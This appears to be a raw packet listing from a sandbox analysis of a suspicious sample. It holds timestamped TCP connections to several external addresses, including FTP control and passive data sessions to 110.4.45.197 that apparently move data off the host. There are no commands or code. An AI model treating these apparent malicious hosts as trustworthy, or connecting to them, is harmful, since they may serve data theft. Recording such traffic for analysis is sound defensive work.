                                                                                            Oct 30, 2024 08:35:12.927900076 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.927962065 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.928016901 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.928076982 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.928726912 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.928791046 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.929542065 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.929594040 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.929676056 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.929729939 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.930536032 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.930588007 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.931324005 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.931382895 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.960139990 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.960205078 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.960951090 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.961009026 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.961009026 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.961025000 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.961061954 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.961402893 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.961460114 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.962047100 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.962222099 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.962762117 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.962815046 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.002480984 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.002582073 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.006917000 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.007209063 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.042511940 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.042586088 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.042769909 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.042839050 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.043246031 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.043318987 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.043411016 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.043473959 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.044270992 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.044343948 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.045209885 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.045274019 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.045346022 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.045406103 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.045497894 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.045561075 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.046407938 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.046482086 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.047424078 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.047499895 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.048655987 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.048724890 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.049211025 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.049274921 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.049379110 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.049443960 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.049654007 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.049715042 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.049875021 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.049978971 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.050740004 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.050806999 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.051693916 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.051767111 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.051799059 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.051848888 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.051872969 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.052500963 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.052562952 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.053412914 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.053482056 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.053699017 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.053757906 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.054100990 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.054164886 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.076303959 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076394081 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.076395988 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076411963 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076452971 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.076561928 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076622009 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.076668978 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076728106 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.076817989 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.076879978 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.077040911 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.077100039 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.077219963 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.077274084 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.077389956 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.077451944 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.077605009 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.077658892 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.077759981 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.077821970 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.078007936 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.078067064 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.118396044 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.118514061 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.118530035 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.118563890 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.118607044 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.118607044 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.135332108 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.135410070 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158514977 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158572912 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158795118 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158840895 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158849955 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158863068 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158885956 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158898115 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158898115 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158912897 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158962011 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.158966064 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.158998013 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159004927 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159032106 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159051895 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159073114 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159132004 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159266949 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159317970 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159321070 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159329891 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159364939 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.159420013 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.159475088 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.160326004 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160388947 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.160613060 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160670042 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.160676956 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160689116 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160739899 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160739899 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.160751104 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160784960 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.160882950 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.160940886 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.161314011 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.161356926 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.161374092 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.161381006 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.161403894 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.161420107 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.161746025 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.161796093 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162045002 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162126064 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162235975 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162288904 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162292957 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162309885 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162314892 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162348986 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162373066 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162412882 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162480116 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162563086 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162616014 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162753105 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162805080 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162808895 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162817001 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162874937 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162878990 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.162887096 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.162921906 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.191845894 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.191909075 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.191991091 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192042112 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192142963 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192194939 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192342043 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192404032 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192410946 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192454100 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192495108 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193481922 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193499088 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.193520069 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193526030 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.251085043 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.295994997 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.341002941 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.346364975 CET5555349738110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.346421957 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.348221064 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.353487015 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.264015913 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.264195919 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.270169973 CET5555349738110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.270309925 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.314985991 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.599478960 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.649988890 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:17.102197886 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.102242947 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.102365017 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.112234116 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.112251043 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.710941076 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.711061001 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.712603092 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.712614059 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.712860107 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.785811901 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.793137074 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.835345030 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964560986 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964631081 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964765072 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.967678070 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:19.946712017 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:19.952384949 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:19.952461958 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:19.983376026 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:20.865628004 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:20.865926981 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:20.871320963 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.207725048 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.208947897 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.214421034 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.581561089 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.585005999 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.590488911 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.926707029 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.926950932 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.932286978 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.269224882 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.269404888 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.274812937 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.611031055 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.614164114 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.619565010 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.956015110 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.956649065 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.962532043 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.962678909 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.962696075 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.968097925 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.899625063 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.900856018 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.900856018 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.906374931 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.906940937 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.907031059 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.942132950 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.250138044 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.307506084 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.370490074 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.545617104 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.883752108 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.884253025 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.891036034 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.891144991 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.891191006 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.896512985 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.791163921 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.791393042 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.791440010 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.798177958 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798194885 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798208952 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798573017 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798628092 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.832731009 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.135822058 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.136253119 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.141680956 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.478383064 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.478844881 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.484154940 CET6246649749110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.484241009 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.487298012 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.492630959 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.406430006 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.406723022 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.414047956 CET6246649749110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.414140940 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.457712889 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.762337923 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.817055941 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:28.521960020 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522013903 CET4434975050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.522116899 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522207975 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522277117 CET4434975050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.522340059 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.540868044 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.540918112 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.541008949 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.542107105 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.542126894 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.215665102 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.215806007 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.219444036 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.219458103 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.219779015 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.259332895 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.402861118 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.447349072 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566586971 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566616058 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566628933 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566715002 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.566731930 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.610290051 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683175087 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683195114 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683285952 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683295012 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683307886 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683336020 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683340073 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683356047 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683406115 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.685308933 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.685388088 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.715882063 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.716042995 CET49751443192.168.2.450.116.93.185
